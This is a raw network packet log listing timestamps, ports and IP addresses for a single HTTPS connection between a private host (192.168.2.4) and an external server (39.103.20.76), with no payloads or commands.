Oct 2, 2024 04:27:26.399638891 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.399655104 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.399667978 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.399676085 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.399703026 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.399703026 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.399718046 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.399744034 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.399776936 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.399842024 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.399889946 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.399892092 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.399899960 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.399928093 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.399940968 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.399946928 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.399996996 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.399997950 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400007963 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400054932 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400078058 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400119066 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400120020 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400135040 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400162935 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400182009 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400257111 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400304079 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400307894 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400314093 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400347948 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400366068 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400463104 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400506020 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400513887 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400517941 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400549889 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400556087 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400571108 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400573969 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400603056 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400624990 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400701046 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400741100 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400748968 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400753021 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400787115 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400790930 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400799990 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400803089 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400835037 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400835991 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400863886 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400867939 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400878906 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400897026 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400928974 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.400932074 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.400974035 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401017904 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401057005 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401067019 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401071072 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401103973 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401103973 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401113987 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401144981 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401160002 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401263952 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401305914 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401312113 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401316881 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401345015 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401356936 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401377916 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401381016 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401405096 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401432037 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401478052 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401520014 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401537895 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401540995 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401562929 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401565075 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401586056 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401590109 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401609898 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401617050 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401642084 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401654959 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401659966 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401726961 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401726961 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401763916 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401820898 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401901007 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401938915 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401952028 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.401956081 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.401997089 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.486939907 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487001896 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487025976 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487068892 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487078905 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487082958 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487108946 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487116098 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487131119 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487134933 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487159967 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487184048 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487230062 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487279892 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487279892 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487291098 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487320900 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487327099 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487337112 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487369061 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487387896 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487406015 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487451077 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487453938 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487462997 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487498045 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487510920 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487629890 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487674952 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487680912 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487684011 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487715006 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487719059 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487732887 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487736940 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487767935 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487792015 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487865925 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487910032 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487910986 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487919092 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.487956047 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.487962961 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488014936 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488018990 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488069057 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488157034 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488193035 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488205910 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488209963 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488234997 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488243103 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488253117 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488256931 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488286018 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488312960 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488431931 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488512039 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488512039 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488523006 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488555908 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488570929 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488568068 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488581896 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488617897 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488632917 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488678932 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488684893 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488735914 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488737106 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488745928 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488781929 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488785982 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488802910 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488832951 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488846064 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488856077 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488895893 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488900900 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488913059 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.488944054 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488976955 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.488995075 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.489044905 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.574049950 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.574114084 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.642412901 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.642474890 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.642476082 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.642487049 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.642530918 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.642538071 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.642585993 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.642590046 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.642599106 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.642635107 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.642642975 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.642649889 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.642656088 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.642684937 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.642695904 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.642735958 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.642780066 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.642791986 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.642796040 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.642822027 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.642834902 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.642952919 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643018007 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643018007 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643027067 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643062115 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643083096 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643084049 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643093109 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643131018 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643140078 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643145084 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643170118 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643182039 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643225908 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643281937 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643286943 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643290997 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643323898 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643337965 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643337965 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643347979 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643390894 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643513918 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643557072 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643563986 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643568039 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643598080 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643604994 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643609047 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643645048 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643646955 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643656969 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643692017 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643704891 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643706083 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643722057 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643750906 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643768072 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643779993 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643784046 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643804073 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643812895 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643831015 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643835068 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643842936 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643871069 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.643877029 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.643930912 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644056082 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644095898 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644100904 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644104958 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644134998 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644146919 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644150972 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644176960 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644192934 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644196033 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644212008 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644237041 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644251108 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644262075 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644308090 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644309044 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644318104 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644356966 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644359112 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644368887 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644406080 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644725084 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644769907 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644789934 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644793987 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644820929 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644840956 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644860983 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.644865036 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.644913912 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.728960991 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729005098 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729022026 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729028940 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729051113 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729062080 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729074955 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729079008 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729110956 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729123116 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729134083 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729171991 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729187965 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729192019 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729221106 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729233980 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729249954 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729301929 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729361057 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729403019 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729404926 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729410887 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729415894 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729463100 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729485989 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729556084 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729614019 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729661942 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729667902 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729671955 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729700089 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729720116 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729724884 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729748011 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729768038 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729821920 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729862928 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729897976 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729904890 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.729912996 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.729944944 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730000019 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730040073 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730057955 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730061054 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730082989 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730098009 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730101109 CEST	443	49738	39.103.20.76	192.168.2.4
